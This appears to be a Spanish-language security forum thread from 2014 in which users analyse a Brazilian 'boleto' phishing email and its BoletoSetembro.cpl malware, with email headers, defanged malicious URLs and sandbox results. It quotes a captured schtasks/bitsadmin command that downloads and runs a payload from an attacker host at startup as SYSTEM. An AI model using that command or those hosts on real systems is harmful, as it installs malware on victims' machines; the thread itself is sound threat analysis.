BoletoSetembro.cpl

Iniciado por r32, 2 Septiembre 2014, 20:07 PM

0 Miembros y 1 Visitante están viendo este tema.

r32

Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.

Aquí el código del mensaje de hotmail:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id

=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com

with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <[color=#FF0000]mixelyx@hotmail.com[/color]> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php

"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png

" alt=""></a> <p><img src="
hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>


VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com
Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:
Citar"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55
CitarEl archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.

r32

#1
Envié el archivo "bitsadmin.exe" a Kaspersky Lab para que le echaran un vistazo, no era normal que descargase ese ejecutable.
La respuesta fue que no ven nada raro en el comportamiento de ese ejecutable, pero.....
Si lo descarga es para algo, no? si nos fijamos bien en las funciones que puede llegar a realizar vemos que lo utiliza como túnel, a traves de el, crea un proceso y utiliza las funciones necesarias, veamos que puede hacer.
Si echamos un vistazo a la MSDN vemos todas las funciones que puede llegar a usar:

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Puede hacer uso de red, listado de archivos, conexión bajo proxy.
Aquí un listado más completo de sus funciones:

http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx

BITSAdmin Tool segun veo es para win XP, lo podemos descargar en este paquete:

Windows XP Service Pack 2 Support Tools:
Descarga: http://www.microsoft.com/en-us/download/details.aspx?id=18546
D.Directa: http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe

Podemos extraerlo con winrar por ejemplo:



Ahora solo tenemos que volver a extraer el contenido del archivo "support.cab" (4.699 KB), aparecerán todos los archivos incluido "bitsadmin.exe".



Vemos que, tanto peso, como hash coinciden, no han tocado para nada ese ejecutable, por eso comentaba lo del puente.
El archivo "BoletoSetembro.cpl" es el que lo controla, aunque aun no he podido probarlo.

Otro archivo que descarga es una dll (Anonymizer.dll), desde aquí:
hxtp://gerenciador2015.com.br/a001/Anonymizer.dll
(SHA256:    6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597)

Otro 0/55:
VT: https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/

AI: https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6

CitarProcesses Created:    
Executable    Command Line
C:\WINDOWS\system32\regsvr32.exe   regsvr32.exe /u /s .\d1.tmp.dll

Realiza muchisimos cambios esta dll.

Saludos.

x64core

El archivo bitsadmin.exe es legitimo, malware descargando, 'dropeando' archivos legitimos no es nuevo, lo hacen para
confundir el analisis o para evadir el analisis de algunos Antivirus que paran de analizar cuando verifican algun archivo legitimo
o que este firmado tambien para confundir al usuario.

r32

Han cambiado de estrategia, han subido un geolocalizador de ip´s, tienen su ftp, aqui el paste con los datos:

VT: https://www.virustotal.com/es/file/7f72782d38e79a70111c0d9ab6bb1b73825e10651d46e6d06e356c3cf19910c5/analysis/1411175821/
AI: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&call=first
Traffic: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&download=traffic.pcap

Name                         Query Type        Query Result   
geoip.s12.com.br        DNS_TYPE_A      23.246.231.82

FTP: xftp://geoip.s12.com.br

http://pastebin.com/rTWPZ24q

A ver que sorpresita esconde, aun no he mirado del todo.

r32

#4
Otro intento....

Segue em anexo a 2 via do boleto, Dpto Juridico.


Paste: http://pastebin.com/tQjzEtqT

Luego subo más.

Saludos.